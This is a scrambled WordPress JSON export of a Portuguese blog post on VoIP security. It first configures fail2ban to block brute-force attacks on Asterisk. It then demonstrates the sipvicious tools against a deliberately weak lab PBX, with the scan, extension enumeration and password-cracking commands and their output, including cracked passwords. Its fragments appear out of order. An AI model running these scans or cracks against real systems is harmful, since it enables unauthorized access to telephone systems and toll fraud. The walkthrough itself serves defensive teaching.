Cr\u00e9ditos: Wagner Nunes (http:\/\/wnunes.com) modificado por Ulisses F\u00e9res.<\/p>\n
Uma forma simples de minimizar problemas com ataques por for\u00e7a bruna no asterisk \u00e9 a implementa\u00e7\u00e3o do fail2ban.<\/p>\n
Na pratica este servi\u00e7o analisa as entradas nos logs e implementa regras de iptables baseadas nessa analise, desta forma a reincid\u00eancia de express\u00f5es como \u201cWrong password\u201d nos logs do asterisk gera um drop no iptables para o ip que est\u00e1 tentando se autenticar.<\/p>\n
Instalando o fail2ban<\/p>\n
Depend\u00eancias:<\/p>\n
* python
\n * iptables<\/p>\n
No debian, para se certificar que as depend\u00eancias est\u00e3o instaladas, basta rodar o seguinte comando:<\/p>\n
#apt-get install python iptables<\/p>\n
Descompacte o pacote
\nConfigurando o Fail2Ban<\/p>\n
Agora n\u00f3s precisamos fazer com que o fail2ban seja capaz de identificar ataques contra o asterisk.<\/p>\n
Os arquivos de configura\u00e7\u00e3o ficam em: \/etc\/fail2ban\/filter.d<\/p>\n
Vamos criar aqui um arquivo para o asterisk.<\/p>\n
#touch asterisk.conf<\/p>\n
Este arquivo deve conter o seguinte:
\n#—————————————————————-
\n[INCLUDES]<\/p>\n
[Definition] #————————————————————————<\/p>\n ATEN\u00c7\u00c3O, NO ASTERISK 1.8 foi necess\u00e1rio fazer alguns ajustes nesse arquivo, adicionando a frente da string HOST o parametro (:[0-9]{1,5})? ficando como abaixo:<\/p>\n [INCLUDES] failregex = NOTICE.* .*: Registration from ‘.*’ failed for ‘ ignoreregex =<\/p>\n ——————————————————————————————- [INCLUDES] No aquivo \/etc\/fail2ban\/jail.conf inclua as seguintes linhas:<\/p>\n [asterisk-iptables] Maxretry determina a quantidade de erros que o fail2ban vai aceitar de um determinado host antes de bani-lo.<\/p>\n O bantime \u00e9 em segundos, portanto neste caso qualquer tentativa de ataque ao asterisk ser\u00e1 banida por 72 horas.<\/p>\n Para n\u00e3o banir voc\u00ea mesmo, no jail.conf, procure pela tag [DEFAULT], no paramento ignoreip informe seu ip.<\/p>\n Edite o \/etc\/asterisk\/logger.conf e defina o dateformat da seguinte forma.<\/p>\n \/etc\/asterisk\/logger.conf [logfiles] Feito isso \u00e9 s\u00f3 dar reload no logger<\/p>\n asterisk -rx \u201dlogger reload\u201d<\/p>\n Para verificar se o fail2ban subiu, basta rodar o seguinte comando:<\/p>\n \/etc\/init.d\/fail2ban stop iptables -L -v<\/p>\n As seguintes linhas devem aparecer:<\/p>\n Chain fail2ban-ASTERISK (1 references) Adicionar a run level para in\u00edcio autom\u00e1tico: ——————— Mas chega de enrola\u00e7\u00e3o, o objetivo deste artigo \u00e9 mostrar como funciona uma das ferramentas mais usadas nesse tipo de ataque.<\/p>\n Lembrando que este material tem carater meramente educativo, E EU N\u00c3O ME RESPONSABILIZO DE FORMA ALGUMA PELO MAU USO DAS INFORMA\u00c7\u00d5ES AQUI CONTIDAS. <\/p>\n O que \u00e9 o sipvicious? Requisitos: * Para este teste, uma rede foi montada com os erros mais comuns na administra\u00e7\u00e3o de servidores Asterisk, s\u00e3o eles: Neste teste n\u00f3s nem vamos utilizar todas estas falhas, mas pense a respeito!!!!<\/p>\n Download do sipvicious<\/p>\n wget http:\/\/sipvicious.googlecode.com\/files\/sipvicious-0.2.4.tar.gz Vamos rastrear os dipositivos SIP na rede.<\/p>\n .\/svmap.py 10.6.12.0\/24<\/p>\n | SIP Device | User Agent | Fingerprint | .\/svwar.py 10.6.12.23 <\/p>\n | Extension | Authentication | Para teste de senhas numericas basta rodar o seguinte comando. Senha fraca n\u00e9??? .\/svcrack.py 10.6.12.23 -u 202 -d \/etc\/dicionario.txt<\/p>\n | Extension | Password | Cr\u00e9ditos: Wagner Nunes (http:\/\/wnunes.com) modificado por Ulisses F\u00e9res. Uma forma simples de minimizar problemas com ataques por for\u00e7a bruna no asterisk \u00e9 a implementa\u00e7\u00e3o do fail2ban. Na pratica este servi\u00e7o analisa as entradas nos logs e implementa regras de iptables baseadas nessa analise, desta forma…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=\/wp\/v2\/posts\/162"}],"collection":[{"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=162"}],"version-history":[{"count":0,"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=\/wp\/v2\/posts\/162\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=162"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=162"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.abratel.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=162"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nfailregex = NOTICE.* .*: Registration from \u2018.*\u2019 failed for \u2018
\n NOTICE.* .*: Registration from \u2018.*\u2019 failed for \u2018
\n NOTICE.* .*: Registration from \u2018.*\u2019 failed for \u2018
\n NOTICE.* .*: Registration from \u2018.*\u2019 failed for \u2018
\n NOTICE.*
\n NOTICE.* .*: No registration for peer \u2018.*\u2019 \\(from
\n NOTICE.* .*: Host
\n NOTICE.* .*: Failed to authenticate user .*@
\nignoreregex =<\/p>\n
\n[Definition]<\/p>\n
\n NOTICE.* .*: Registration from ‘.*’ failed for ‘
\n NOTICE.* .*: Registration from ‘.*’ failed for ‘
\n NOTICE.* .*: Registration from ‘.*’ failed for ‘
\n NOTICE.*
\n NOTICE.* .*: No registration for peer ‘.*’ \\(from
\n NOTICE.* .*: Host
\n NOTICE.* .*: Failed to authenticate user .*@
\nATEN\u00c7\u00c3O, NO ASTERISK 1.6 foi necess\u00e1rio fazer alguns ajustes como abaixo:<\/p>\n
\n[Definition]
\nfailregex = NOTICE.* .*: Registration from ‘.*’ failed for ‘
\n NOTICE.* .*: Registration from ‘.*’ failed for ‘
\n NOTICE.* .*: Registration from ‘.*’ failed for ‘
\n NOTICE.* .*: Registration from ‘.*’ failed for ‘
\n NOTICE.* .*:
\n NOTICE.* .*: No registration for peer ‘.*’ (from
\n NOTICE.* .*: Host
\n NOTICE.* .*: Failed to authenticate user .*@
\nignoreregex =
\n———————————————————————————————<\/p>\n
\nenabled = true
\nfilter = asterisk
\naction = iptables-allports[name=ASTERISK, protocol=all]
\nsendmail-whois[name=ASTERISK, dest=root, sender=abratel@gmail.com
\nlogpath = \/var\/log\/asterisk\/messages
\nmaxretry = 3
\nbantime = 259200<\/p>\n
\n[general]
\ndateformat=%F %T<\/p>\n
\nconsole => notice,warning,error,debug,verbose
\nmessages => notice,warning,error
\nfull => notice,warning,error,debug,verbose
\nsyslog.local0 => notice<\/p>\n
\n\/etc\/init.d\/fail2ban start<\/p>\n
\n pkts bytes target prot opt in out source destination
\n6287K 1158M RETURN all \u2013 any any anywhere anywhere<\/p>\n
\nln -s \/etc\/init.d\/fail2ban \/etc\/rc2\/S99fail2ban<\/p>\n
\nTestando
\n———————<\/p>\n
\nSipvicious \u00e9 uma suite de ferramentas para auditoria em sistemas voip baseados em sip, ele \u00e9 composto por 4 ferramentas:
\nsvmap \u2013 Um sip scanner capas de listar dispositivos sip em uma rede ou range de ips.
\nsvwar \u2013 Ferramenta que identifica ramais sip em um PBX.
\nsvcrack \u2013 Ferramenta para quebrar senhas de ramais sip.<\/p>\n
\nPython 2.4 ou superior.
\nO ideial \u00e9 que n\u00e3o haja um asterisk rodando na maquina de testes, por uma quest\u00e3o de utliza\u00e7\u00e3o da porta 5060, ok.
\nOk, m\u00e3os a obra.<\/p>\n
\n * Ramais onde a senha \u00e9 o numero do ramal.
\n * Ramais com senhas toscas que podem ser facilmente encontradas em wordlists.
\n * Ramais sem senha.
\n * Firewall chumbrega.
\n * fail2ban nem pensar.
\n * Sem regras de permit\/deny no sip.conf
\n * Todos os ramais ligam pra qualquer lugar.<\/p>\n
\ntar -zxvf sipvicious-0.2.4.tar.gz
\ncd sipvicious-0.2.4<\/p>\n
\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014-
\n| 10.6.12.76:5060 | Asterisk PBX | Asterisk PBX |
\n| 10.6.12.65:5060 | T20 9.41.0.80 | AVM or Speedport |
\n| 10.6.12.47:5060 | T20 9.41.0.70 | AVM or Speedport |
\n| 10.6.12.48:5060 | T20 9.41.0.80 | AVM or Speedport |
\n| 10.6.12.43:5060 | Grandstream GXP280 1.2.3.5 | Grandstream phone |
\n| 10.6.12.45:5060 | Grandstream GXP280 1.2.3.5 | Grandstream phone |
\n| 10.6.12.83:5060 | Grandstream GXP280 1.2.2.26 | Grandstream phone |
\n| 10.6.12.31:5060 | T20 9.41.0.70 | AVM or Speedport |
\n| 10.6.12.55:5060 | T20 9.41.0.70 | AVM or Speedport |
\n| 10.6.12.80:5060 | T20 9.41.0.80 | AVM or Speedport |
\n| 10.6.12.240:5060 | Asterisk PBX | Asterisk \/ Linksys\/PAP2T-3.1.15(LS) |
\n| 10.6.12.3:5060 | Asterisk PBX | Asterisk \/ Linksys\/PAP2T-3.1.15(LS) |
\n| 10.6.12.32:5060 | Yealink SIP-T20P 9.41.0.77 00:15:65:11:c2:8d | AVM or Speedport |
\n| 10.6.12.34:5060 | T20 9.41.0.80 | AVM or Speedport |
\n| 10.6.12.23:5060 | Asterisk PBX | Asterisk PBX |
\nOk, o 23 ta com cara de alvo. Vamos ver oque ele tem<\/p>\n
\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014
\n| 201 | reqauth |
\n| 200 | reqauth |
\n| 203 | reqauth |
\n| 205 | reqauth |
\n| 204 | reqauth |
\n| 207 | reqauth |
\n| 206 | reqauth |
\n| 208 | reqauth |
\n| 210 | reqauth |
\n| 211 | reqauth |
\n| 501 | reqauth |
\n| 217 | reqauth |
\n| 500 | reqauth |
\n| 212 | reqauth |
\n| 250 | reqauth |
\n| 220 | reqauth |
\n| 502 | reqauth |
\n| 222 | reqauth |
\n| 221 | reqauth |
\n| 213 | reqauth |
\n| 1100 | noauth |
\n| 1101 | noauth |<\/p>\n
\n.\/svcrack.py 10.6.12.23 -u 201
\n| Extension | Password |
\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2013
\n| 201 | 123 |<\/p>\n
\nSenhas alfanum\u00e9ricas podem ser crackeadas atrav\u00e9z de uma wordlist.<\/p>\n
\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2013
\n| 202 | teste |
\noops, mais uma!!!<\/p>\n","protected":false},"excerpt":{"rendered":"